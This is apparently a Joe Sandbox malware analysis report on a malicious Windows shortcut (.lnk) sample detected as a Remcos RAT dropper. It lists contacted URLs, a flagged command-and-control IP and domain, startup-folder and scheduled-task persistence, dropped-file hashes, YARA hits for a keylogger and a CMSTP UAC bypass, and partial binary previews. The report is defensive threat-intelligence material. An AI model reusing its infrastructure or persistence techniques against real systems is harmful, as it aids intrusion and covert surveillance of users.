http://www.vmware.com/0	DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.datanumen.com/zip-repair/	hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm	DZIPR.exe.12.dr	false	Avira URL Cloud: safe	unknown
http://www.info-zip.org/	DZIPR.exe, 0000000C.00000002.1398577312.000000000353D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.0000000005524000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.0000000005225000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.000000000514A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.000000000552B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0/	DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000012.00000003.1494645538.00000174C5570000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr	false	Avira URL Cloud: safe	unknown
https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf	DZIPR.exe.12.dr	false	Avira URL Cloud: safe	unknown
http://c0rl.m%L	DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.repairfile.com	DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://support.datanumen.com	DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.datanumen.com/%https://www.datanumen.com/zip-repair/	DZIPR.exe.12.dr	false	Avira URL Cloud: safe	unknown
https://www.datanumen.com/support/	DZIPR.exe.12.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.94.3.25	lawyerconsult.top	United States		3223	VOXILITYGB	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518485
Start date and time:	2024-09-25 18:32:55 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MdkbG2pK4l.lnk renamed because original name is a hash value
Original Sample Name:	9ee2b12e8974f00111bb9887f7f9e19f.lnk
Detection:	MAL
Classification:	mal100.troj.expl.evad.winLNK@34/27@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 69 Number of non-executed functions: 237
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: MdkbG2pK4l.lnk

Simulations

Behavior and APIs

Time	Type	Description
12:33:50	API Interceptor	45x Sleep call for process: powershell.exe modified
14:11:31	API Interceptor	2x Sleep call for process: svchost.exe modified
14:11:41	API Interceptor	8x Sleep call for process: cmd.exe modified
14:12:04	API Interceptor	1x Sleep call for process: explorer.exe modified
20:11:36	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp
20:11:39	Task Scheduler	Run new task: lnfast_x64 path: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
20:11:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.94.3.25	55Ka50lb6Z.bat	Get hash	malicious	Remcos	Browse	172.94.3.25/AUGUST.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VOXILITYGB	55Ka50lb6Z.bat	Get hash	malicious	Remcos	Browse	172.94.3.25
	zz91Dcv5Kf.dll	Get hash	malicious	Remcos	Browse	172.94.9.207
	V9HUU0LCin.dll	Get hash	malicious	Remcos	Browse	172.94.9.207
	E5r67vtBtc6.exe	Get hash	malicious	Xmrig	Browse	172.94.15.211
	Miner-XMR2.exe	Get hash	malicious	Xmrig	Browse	172.94.15.211
	af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exe	Get hash	malicious	Nanocore, Remcos	Browse	104.243.242.162
	zczsJahg5p.exe	Get hash	malicious	Nanocore, Remcos, PureLog Stealer	Browse	104.243.242.164
	SLL8zVmaGj.elf	Get hash	malicious	Unknown	Browse	185.247.61.190
	tfEceyjWwA.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	104.243.242.171
	UlKVk4jZsk.exe	Get hash	malicious	PureLog Stealer	Browse	104.243.242.162

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\paogviura	epht1Y3TGZ.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Temp\paogviura	55Ka50lb6Z.bat	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	epht1Y3TGZ.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	55Ka50lb6Z.bat	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Temp\lejp	epht1Y3TGZ.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Temp\lejp	55Ka50lb6Z.bat	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7326883089912865
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq6:2JIB/wUKUKQncEmYRTwh0a
MD5:	B1F13A8EAF6BE6F03654DB76A9710DBF
SHA1:	AAE6675DE8A3789FCBD153CE15B637DD4CEF596B
SHA-256:	54595DF67709C099469CE2E25E6B2BEA8F9128BB1A8E2FBAF864E0C193A51F9F
SHA-512:	0A8ECD03F2C8C99D6338415BCC36A191E5452E81570A9BBF0243ED3BFB278559DC80924B1971D460BA8A02AA17E7CFC927302B46F2E4731C6C4095196F41E58C
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0bed3222, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7899806607291557
Encrypted:	false
SSDEEP:	1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii
MD5:	571F8D63131505D8FE5CA1507A31490D
SHA1:	E93D77A28D92CEEDAF384C4D4B6D660CED90F799
SHA-256:	0BA98F6B323C49982B5AC577EFBAFEFDBC23AAC57189CA43BC19769097C5095D
SHA-512:	1578106B794B514F92974A3C43D573F042861DFA3B798E186145505DF09F86DAF1229CECF402011F01A034A621CCF65C0424B1633FDAB2CC0F7933B03372E343
Malicious:	false
Preview:	..2"... ...............X\...;...{......................0.`.....42...{5......\|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................e..M.....\|..................A..}.....\|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08098116476071052
Encrypted:	false
SSDEEP:	3:t/KYeNx4fg1t/57Dek3JDtI7OAllEqW3l/TjzzQ/t:1KzNxOgHR3txIaAmd8/
MD5:	6DC5975EB1913EE9C888DA158D206276
SHA1:	BC9FB85E2B60E4B272041DEFAD07718CCF5D53A0
SHA-256:	B1DE926B1389EC39C394D35D6F6C0BE2C1B3E6523A02803B11E5FD5CEBAD9D5F
SHA-512:	35C90099799760A609A35084C2A1BE0B84A414914E1FDA4F8CAE6F306B753E705D4F2CA72E88487399EDB49EEDDD29753C1C6A5959E6DD0E67AC40DA61B1840E
Malicious:	false
Preview:	+........................................;...{.......\|..42...{5.........42...{5.42...{5...Y.42...{59................A..}.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllultnxj:NllU
MD5:	F93358E626551B46E6ED5A0A9D29BD51
SHA1:	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
SHA-256:	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
SHA-512:	D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\161ebd1

Download File

Process:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
File Type:	data
Category:	modified
Size (bytes):	1234044
Entropy (8bit):	7.626167332636038
Encrypted:	false
SSDEEP:	24576:oNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:J/twxKL8AvcTifHxftmul4m4/nzUN9ae
MD5:	DC17A490C8D1ABD780EDB011952FFC38
SHA1:	938C15001B096BFB72633861FDAAAF6DF53C084D
SHA-256:	9CB638622822CB1B95369704623C12D215170E14CC13168672CE9E97098C66CF
SHA-512:	A3CE1FE80D8FDC4BD6F03E4CF594FAFA803A4FD48E592884A41B18D1DE5F665C79DB285477AD12FA4AE9D5AEFA8610D2F4FF34FE281B5C0615DED2F0E6AE1DBB
Malicious:	false
Preview:	s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5

C:\Users\user\AppData\Local\Temp\32f7631

Download File

Process:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
File Type:	data
Category:	modified
Size (bytes):	1234044
Entropy (8bit):	7.6261685464265785
Encrypted:	false
SSDEEP:	24576:PNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:A/twxKL8AvcTifHxftmul4m4/nzUN9ae
MD5:	728E69D6EAC04926643AA1E73F9D2282
SHA1:	8FD0099F95B08059AA417B8CDBD403C586A83214
SHA-256:	1B90DF8D05E3AF6291F043664E9C071DD4726F9DFD4E91E06A683A3A5337BFF2
SHA-512:	F430DA71266C96C454EADE682D3CDCD1816EC4CEB3C57D776EA97C17FC37FBB02EE32F59F153C8A69A194BD3C087023CAD37C7EF083E822B5FA4DF44C9C3F6F3
Malicious:	false
Preview:	s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oduknhyj.r2i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\eb07f5bb

Download File

Process:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
File Type:	data
Category:	modified
Size (bytes):	1234044
Entropy (8bit):	7.626169702823665
Encrypted:	false
SSDEEP:	24576:CNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:D/twxKL8AvcTifHxftmul4m4/nzUN9ae
MD5:	2DE0E9B8C7CC678C2C310FDC6BE1E6BA
SHA1:	6994E10583C32897ABF910AC3F29E4EA7B3ACC75
SHA-256:	3B1DA5F941FBEF8A65D0DD0D0B2ED89B76D9DA2380ED1A324290CB889FA1A902
SHA-512:	AFD6FA3C4862634517C71A9EB783FF111771A7F45E788C27D61DB4CB89BA62BFCD96EE22B392DF683B0B65C2CB0DB5D9B65C486A118877350E95C4F2324373EC
Malicious:	false
Preview:	s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5

C:\Users\user\AppData\Local\Temp\f5c98f9e

Download File

Process:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
File Type:	data
Category:	modified
Size (bytes):	1234044
Entropy (8bit):	7.626169129003627
Encrypted:	false
SSDEEP:	24576:KNyjiDKtPtRGaoxz+LtafJwPxWE9rupTi1pHxLUlitmuUkdUC+7m4/nz9qVv9Pye:7/twxKL8AvcTifHxftmul4m4/nzUN9ae
MD5:	B51F5C77F1DCB37CD0B9CD0D92B9497A
SHA1:	53EDE7AE793F9D460FABE2706B8CF7F8863EC305
SHA-256:	B88B072E4626E1C45BAE22710BE2578D9807B9D96B3304998A577C2F9B5C00FE
SHA-512:	5F7D484B4F120E46B9EEE0162E2C856F7B6AFFA9A276C5825065D493423921FEA944CDF54BD9C9B7530C2B7ACB822F429728EFDF58A91B94CB12E18CB1C96478
Malicious:	false
Preview:	s.5q.5q.5p.5q.54.5d.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..e4..tU..\...F...i'..Q...i#..G...P...e...G...i#..G...5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..[...T...P5..5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.53..G...P9..A...Pp.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5U..{4...,..V...Z...{5..s...P...^p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5...^..B.5p.5p.5p.5p.5p.5p.5p.5p.5p.5p.5

C:\Users\user\AppData\Local\Temp\gnqpmvvlbu

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	500224
Entropy (8bit):	6.590620352205087
Encrypted:	false
SSDEEP:	6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
MD5:	6CA401F82443B673FCA7D7DDB0A05357
SHA1:	82E54CBDCF4E12A72A32E52E0FD03C095485B841
SHA-256:	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
SHA-512:	A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Joe Sandbox View:	Filename: epht1Y3TGZ.exe, Detection: malicious, Browse Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lejp

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
